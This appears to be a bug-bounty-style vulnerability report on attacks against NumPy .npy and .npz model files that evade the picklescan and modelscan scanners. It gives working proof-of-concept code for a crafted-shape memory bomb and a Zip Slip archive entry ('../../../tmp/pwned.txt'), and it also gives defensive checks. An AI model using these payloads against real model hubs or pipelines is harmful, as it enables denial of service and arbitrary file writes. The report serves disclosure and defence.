NPY/NPZ: Memory Bomb via Crafted Shape, Zip Slip in NPZ Archives, Object Dtype Bypass
Summary
Three non-pickle attack classes against NumPy's .npy and .npz model file formats that bypass both picklescan 1.0.4 and modelscan 0.8.8 (100% evasion rate across 5 payloads):
- Memory bomb via crafted header shape: a `.npy` file with `shape: (1000000, 1000000)` but only 4 bytes of data triggers a 3.64 TiB memory allocation attempt, crashing the process. No pickle is involved.
- Zip Slip in `.npz` archives: NPZ files are ZIP containers. Injecting `../../../tmp/pwned` as a ZIP entry name achieves arbitrary file write when the archive is extracted to disk by an extractor that does not sanitize entry names.
- Object dtype forces pickle: setting `descr: 'O'` (object dtype) in the NPY header routes loading through pickle deserialization even when the user believes they are loading numeric data. With `allow_pickle=False` the load raises an error instead of unpickling, but the dtype is still parsed from the header before that check, and the header itself can be manipulated to confuse downstream tools.
Formats: NPY, NPZ ($1,500 MFV each)
Scanners tested: picklescan 1.0.4 + modelscan 0.8.8 (5/5 MISSED by both)
Payloads
| File | Attack | Impact | picklescan | modelscan |
|---|---|---|---|---|
| `npy_shape_bomb.npy` | Header claims shape (1M, 1M), file has 4 bytes | `MemoryError: Unable to allocate 3.64 TiB` → DoS | MISSED | MISSED |
| `npy_negative_shape.npy` | Header claims shape (-1,) | `ValueError` crash → DoS | MISSED | MISSED |
| `npy_object_descr.npy` | Header sets `descr: 'O'` (object) | Forces pickle path, confuses tooling | MISSED | MISSED |
| `npz_zipslip.npz` | ZIP entry named `../../../tmp/pwned.txt` | Arbitrary file write on extraction | MISSED | MISSED |
| `npz_zipbomb.npz` | 10KB compressed → 10MB+ decompressed | Decompression DoS | MISSED | MISSED |
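The `npz_zipbomb.npz` row can be triaged from ZIP metadata alone. The following is a minimal sketch, not one of the payloads above: `npz_expansion`, `max_ratio`, and `max_total` are hypothetical names and thresholds chosen for illustration. It sums the sizes declared in the archive's central directory, so it assumes those declared sizes are honest; a stricter check would also cap the bytes produced while actually decompressing.

```python
import io
import zipfile


def npz_expansion(source, max_ratio=100.0, max_total=1 << 30):
    """Return (compressed, uncompressed, suspicious) using ZIP metadata only.

    `max_ratio` and `max_total` are illustrative thresholds, not values
    taken from any scanner.
    """
    with zipfile.ZipFile(source) as zf:
        infos = zf.infolist()
    compressed = sum(info.compress_size for info in infos)
    uncompressed = sum(info.file_size for info in infos)
    ratio = uncompressed / max(compressed, 1)
    suspicious = ratio > max_ratio or uncompressed > max_total
    return compressed, uncompressed, suspicious


# Demo: 10 MiB of zero bytes deflates to a tiny entry.
bomb = io.BytesIO()
with zipfile.ZipFile(bomb, "w") as zf:
    zf.writestr("weights.npy", b"\x00" * (10 * 1024 * 1024),
                compress_type=zipfile.ZIP_DEFLATED)
bomb.seek(0)
bomb_compressed, bomb_uncompressed, bomb_flag = npz_expansion(bomb)

# Demo: a small stored (uncompressed) entry has a ratio of 1.
benign = io.BytesIO()
with zipfile.ZipFile(benign, "w") as zf:
    zf.writestr("weights.npy", b"0123456789abcdef")
benign.seek(0)
_, _, benign_flag = npz_expansion(benign)

print(bomb_compressed, bomb_uncompressed, bomb_flag, benign_flag)
```

Checking metadata before reading any entry keeps the check cheap, which matters if it runs on every upload.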
Vulnerability Details
Memory bomb (CWE-400)
The NPY format has a plain-text header containing a Python dict with shape. NumPy allocates product(shape) * dtype_size bytes based on the header, WITHOUT checking that the file actually contains that much data:
import numpy as np
# Crafted NPY header:
#   {'descr': '<f4', 'fortran_order': False, 'shape': (1000000, 1000000)}
# The file is only about 100 bytes in total.
# NumPy tries to allocate 1M * 1M * 4 bytes = 4 TB (3.64 TiB) → immediate out-of-memory failure
arr = np.load("npy_shape_bomb.npy")
# MemoryError: Unable to allocate 3.64 TiB
Attack: upload to a model hub → victim loads the file → process crashes → DoS on the inference server.
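One way to catch this before calling `np.load` is to compare the size the header declares with the bytes actually present after the header. The sketch below uses only the standard library and is an illustration, not NumPy's own logic: `declared_vs_available` is a hypothetical helper, and it deliberately accepts only plain fixed-width numeric `descr` codes (such as `<f4`), refusing everything else.

```python
import ast
import math
import os
import re
import struct
import tempfile

NPY_MAGIC = b"\x93NUMPY"
# Only plain fixed-width numeric codes such as '<f4' or '|b1'; all else is refused.
SIMPLE_DESCR = re.compile(r"[<>|=]?[biufc](\d+)")


def declared_vs_available(path):
    """Return (declared_bytes, available_bytes) for a .npy file without loading it."""
    with open(path, "rb") as f:
        if f.read(6) != NPY_MAGIC:
            raise ValueError("not an NPY file")
        version = f.read(2)
        if len(version) != 2:
            raise ValueError("truncated NPY file")
        # Version 1.0 stores the header length in 2 bytes, later versions in 4.
        fmt = "<H" if version[0] == 1 else "<I"
        (header_len,) = struct.unpack(fmt, f.read(struct.calcsize(fmt)))
        header = ast.literal_eval(f.read(header_len).decode("latin1"))
        data_start = f.tell()
    descr, shape = header["descr"], header["shape"]
    match = SIMPLE_DESCR.fullmatch(descr) if isinstance(descr, str) else None
    if match is None:
        raise ValueError(f"unsupported descr: {descr!r}")
    if not isinstance(shape, tuple) or any(type(d) is not int or d < 0 for d in shape):
        raise ValueError(f"invalid shape: {shape!r}")
    declared = math.prod(shape) * int(match.group(1))
    return declared, os.path.getsize(path) - data_start


# Demo: a v1.0 header claiming (1000000, 1000000) float32, followed by 4 bytes.
header = b"{'descr': '<f4', 'fortran_order': False, 'shape': (1000000, 1000000)}\n"
blob = NPY_MAGIC + b"\x01\x00" + struct.pack("<H", len(header)) + header + b"\x00" * 4
with tempfile.NamedTemporaryFile(suffix=".npy", delete=False) as tmp:
    tmp.write(blob)
declared, available = declared_vs_available(tmp.name)
os.unlink(tmp.name)
print(declared, available)
```

A loader or scanner could refuse the file whenever `declared > available`, which costs a header read instead of an allocation attempt.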
Zip Slip (CWE-22)
NPZ files are standard ZIP archives. `np.load()` reads them in memory (safe), but any tool that extracts NPZ files to disk (model registries, pipeline caches, data loaders) without sanitizing entry names is vulnerable:
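import io
import zipfile
import numpy as np
with zipfile.ZipFile("malicious.npz", "w") as zf:
    buf = io.BytesIO()
    np.save(buf, np.array([1.0]))
    zf.writestr("weights.npy", buf.getvalue())       # legitimate array entry
    zf.writestr("../../../tmp/pwned.txt", b"PWNED")  # traversal entry
# np.load() reads entries in memory (safe).
# The risk is on extraction to disk: code that joins the raw entry name onto the
# target directory writes outside it. Python's own ZipFile.extract()/extractall()
# strip ".." components, so exposure depends on the extractor in use.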
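A tool that must extract NPZ entries to disk can inspect entry names first. The following is a minimal sketch under stated assumptions: `escaping_members` is a hypothetical helper, and `/srv/models/cache` is a made-up target directory that does not need to exist. It flags any entry whose resolved path would land outside the target directory if the raw name were joined onto it.

```python
import io
import os
import zipfile


def escaping_members(source, dest_dir):
    """List entry names that would resolve outside dest_dir if joined naively."""
    root = os.path.realpath(dest_dir)
    bad = []
    with zipfile.ZipFile(source) as zf:
        for name in zf.namelist():
            target = os.path.realpath(os.path.join(root, name))
            try:
                inside = os.path.commonpath([root, target]) == root
            except ValueError:
                # Raised e.g. for paths on different drives; treat as escaping.
                inside = False
            if not inside:
                bad.append(name)
    return bad


# Demo archive built in memory: one ordinary entry, one traversal entry.
archive = io.BytesIO()
with zipfile.ZipFile(archive, "w") as zf:
    zf.writestr("weights.npy", b"placeholder bytes")
    zf.writestr("../../../tmp/pwned.txt", b"PWNED")
archive.seek(0)

bad = escaping_members(archive, "/srv/models/cache")  # hypothetical directory
print(bad)
```

Rejecting the whole archive when the list is non-empty is simpler to reason about than silently skipping the offending entries.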
Negative shape (CWE-20)
A negative dimension such as (-1,) is not rejected by the header parser:
import numpy as np
# Header: {'descr': '<f4', 'fortran_order': False, 'shape': (-1,)}
np.load("npy_negative_shape.npy")
# ValueError: Failed to read all data for array. Expected (-1,) = -1 elements
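A negative dimension also breaks size calculations downstream. Libraries wrapping NumPy that compute `total_size = product(shape) * itemsize` get a negative result, which can wrap around to a very large value (integer underflow) if it is stored in or cast to an unsigned type.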
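To make the arithmetic concrete, here is a small sketch of the size calculation for shape `(-1,)` with a 4-byte item, and of a guard that rejects such shapes up front. `total_size`, `as_uint64`, and `checked_size` are hypothetical helpers; Python integers do not wrap on their own, so the 64-bit reinterpretation is simulated with a mask to show what a C-level `size_t` or `uint64` would hold.

```python
import math


def total_size(shape, itemsize):
    """Naive size computation, as a wrapper library might write it."""
    return math.prod(shape) * itemsize


def as_uint64(n):
    """Reinterpret a Python int as a 64-bit unsigned value (two's complement)."""
    return n & 0xFFFFFFFFFFFFFFFF


def checked_size(shape, itemsize, limit):
    """Reject negative or non-integer dimensions and sizes above `limit` bytes."""
    if any(type(d) is not int or d < 0 for d in shape):
        raise ValueError(f"invalid shape: {shape!r}")
    size = math.prod(shape) * itemsize
    if size > limit:
        raise ValueError(f"declared size {size} exceeds limit {limit}")
    return size


signed = total_size((-1,), 4)   # -4
wrapped = as_uint64(signed)     # 2**64 - 4
print(signed, wrapped)
```

Validating each dimension before multiplying avoids relying on the sign of the final product, which can be positive again when two dimensions are negative.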
Proof of Concept
import io
import struct
import zipfile
import numpy as np
# Memory bomb: build an NPY v1.0 file from an arbitrary header string
def craft_npy(header_str, data=b""):
    magic = b"\x93NUMPY\x01\x00"  # magic string + version 1.0
    header = header_str.encode("latin1")
    # Pad so that magic (8) + length field (2) + header is a multiple of 64 bytes
    pad = 64 - (10 + len(header)) % 64  # always in 1..64, so no extra adjustment is needed
    header = header + b" " * (pad - 1) + b"\n"
    return magic + struct.pack("<H", len(header)) + header + data
with open("npy_shape_bomb.npy", "wb") as f:
    f.write(craft_npy("{'descr': '<f4', 'fortran_order': False, 'shape': (1000000, 1000000)}", b"\x00" * 4))
# Zip Slip: a valid array entry plus an entry whose name traverses directories
with zipfile.ZipFile("npz_zipslip.npz", "w") as zf:
    buf = io.BytesIO()
    np.save(buf, np.array([1.0]))
    zf.writestr("weights.npy", buf.getvalue())
    zf.writestr("../../../tmp/pwned.txt", b"PWNED via NPZ zip slip")
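The object-dtype payload from the table is distinguishable by its header alone, so a scanner could flag it without loading any data. The sketch below is an assumption about how such a check might look, not how picklescan or modelscan work: `descr_has_object` is a hypothetical helper that takes the already-parsed `descr` value (a string, or a list of field tuples for structured dtypes) and reports whether an object type code appears in it.

```python
import ast


def descr_has_object(descr):
    """True if a parsed NPY 'descr' value names an object dtype ('O')."""
    if isinstance(descr, str):
        # Strip an optional byte-order prefix, then look at the type code.
        return descr.lstrip("<>|=").startswith("O")
    if isinstance(descr, list):
        # Structured dtype: [(name, type), (name, type, shape), ...].
        # Only the type slot is inspected, so field names cannot trigger a match.
        return any(
            isinstance(field, tuple) and len(field) >= 2 and descr_has_object(field[1])
            for field in descr
        )
    # Unknown layout: this sketch reports False; a strict scanner might reject instead.
    return False


# The header dict is a Python literal, so ast.literal_eval parses it without executing code.
header = ast.literal_eval("{'descr': 'O', 'fortran_order': False, 'shape': (1,)}")
flag_object = descr_has_object(header["descr"])
flag_float = descr_has_object("<f4")
flag_struct = descr_has_object([("Oops", "<f4"), ("meta", "|O")])
flag_name_only = descr_has_object([("Oops", "<f4")])
print(flag_object, flag_float, flag_struct, flag_name_only)
```

Flagging on the header keeps the check independent of `allow_pickle`, since it runs before any loader decides how to read the data.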